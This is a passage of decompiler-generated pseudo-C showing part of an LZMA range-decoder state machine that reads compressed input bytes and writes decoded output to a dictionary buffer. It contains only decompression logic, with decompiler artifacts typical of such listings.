                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											goto L132;
                          										case 8:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xa;
                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          											} else {
                          												__eax =  *(__ebp - 0x38);
                          												__ecx =  *(__ebp - 4);
                          												__eax =  *(__ebp - 0x38) + 0xf;
                          												 *(__ebp - 0x84) = 9;
                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          											}
                          											goto L132;
                          										case 9:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L90;
                          											}
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t259;
                          											0 | _t259 = _t259 + _t259 + 9;
                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          											goto L76;
                          										case 0xa:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											__eax =  *(__ebp - 0x28);
                          											goto L89;
                          										case 0xb:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L89:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L90:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L100:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t335 = __ebp - 0x70;
                          											 *_t335 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t335;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L102;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												goto L58;
                          											}
                          										case 0x10:
                          											L110:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t366 = __ebp - 0x70;
                          											 *_t366 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t366;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L112;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											L132:
                          											 *(_t612 - 0x54) = _t605;
                          											goto L133;
                          										case 0x12:
                          											goto L0;
                          										case 0x13:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												goto L144;
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											goto L130;
                          										case 0x14:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											L140:
                          											 *(_t612 - 0x88) = _t533;
                          											goto L1;
                          										case 0x15:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L121;
                          										case 0x16:
                          											__eax =  *(__ebp - 0x30);
                          											__eflags = __eax - 4;
                          											if(__eax >= 4) {
                          												_push(3);
                          												_pop(__eax);
                          											}
                          											__ecx =  *(__ebp - 4);
                          											 *(__ebp - 0x40) = 6;
                          											__eax = __eax << 7;
                          											 *(__ebp - 0x7c) = 0x19;
                          											 *(__ebp - 0x58) = __eax;
                          											goto L145;
                          										case 0x17:
                          											goto L145;
                          										case 0x18:
                          											L146:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x18;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t484 = __ebp - 0x70;
                          											 *_t484 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t484;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L148:
                          											_t487 = __ebp - 0x48;
                          											 *_t487 =  *(__ebp - 0x48) - 1;
                          											__eflags =  *_t487;
                          											goto L149;
                          										case 0x19:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												 *(__ebp - 0x2c) = __ebx;
                          												L120:
                          												_t394 = __ebp - 0x2c;
                          												 *_t394 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t394;
                          												L121:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t401 = __ebp - 0x60;
                          												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t401;
                          												goto L124;
                          											}
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L103:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L109:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L113:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														_t392 = __ebp - 0x2c;
                          														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t392;
                          														goto L120;
                          													}
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L112:
                          														_t369 = __ebp - 0x48;
                          														 *_t369 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t369;
                          														goto L113;
                          													} else {
                          														goto L110;
                          													}
                          												}
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L102:
                          													_t339 = __ebp - 0x48;
                          													 *_t339 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t339;
                          													goto L103;
                          												} else {
                          													goto L100;
                          												}
                          											}
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L109;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L80;
                          										case 0x1b:
                          											L76:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t275 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t275;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t284 = __ebp - 0x64;
                          											 *_t284 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t284;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L80:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L81;
                          										case 0x1c:
                          											while(1) {
                          												L124:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t415 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t415;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t415;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L81:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											 *(__ebp - 0x88) = 0x1c;
                          											L170:
                          											_push(0x22);
                          											_pop(_t567);
                          											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                          											_t535 = 0;
                          											L172:
                          											return _t535;
                          									}
                          								}
                          								L171:
                          								_t535 = _t534 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          						__eax =  *(__ebp - 0x50);
                          						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          						__eax =  *(__ebp - 0x58);
                          						__esi = __edx + __eax;
                          						 *(__ebp - 0x54) = __esi;
                          						__ax =  *__esi;
                          						__edi = __ax & 0x0000ffff;
                          						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          						if( *(__ebp - 0xc) >= __ecx) {
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          							__cx = __ax;
                          							__cx = __ax >> 5;
                          							__eax = __eax - __ecx;
                          							__edx = __edx + 1;
                          							 *__esi = __ax;
                          							 *(__ebp - 0x50) = __edx;
                          						} else {
